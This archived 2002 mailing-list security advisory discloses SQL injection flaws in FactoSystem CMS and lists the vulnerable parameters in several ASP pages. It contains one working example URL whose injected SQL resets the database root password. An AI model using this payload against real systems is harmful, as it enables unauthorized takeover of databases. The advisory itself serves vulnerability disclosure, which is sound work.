OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Matthew Murphy (mattmurphy_at_kc.rr.com)
Date: Fri Aug 30 2002 - 19:40:11 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    FactoSystem CMS Contains Multiple Vulnerabilities

    Impact: Multiple vulnerabilities -- all allowing manipulation of the backend
    database
    Risk: High
    Class: Input Validation Error
    Affected System: IIS 4.0 or later with ASP enabled and FactoSystem CMS
    installed

    Description

    Multiple SQL injection vulnerabilities exist in the FactoSystem Content
    Management System that may allow an attacker to introduce instructions into
    an SQL query. The vulnerabilities exist because the script fails to verify
    the validity of numeric data or fails to properly escape certain control
    characters in strings.

    The problems are in the handling of the query variables "authornumber" (in
    author.asp), and "discussblurbid" (in discuss.asp), and the form variables
    "name" and "email" (in holdcomment.asp). An example is below:

    http://localhost/author.asp?authornumber=1%28%20And%20AuthorTable%2EAuthorID
    %3DBlurbTable%2EAuthorID%20And%20BlurbTable%2ESub_id%3DSubjectTable%2ESub_id
    %20Order%20By%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime%20
    desc%3BUPDATE%20user%20SET%20Password%3DPASSWORD%28%27password%27%29%20WHERE
    %20user%3D%27root%27%3B%20FLUSH%20PRIVILEGES%3B--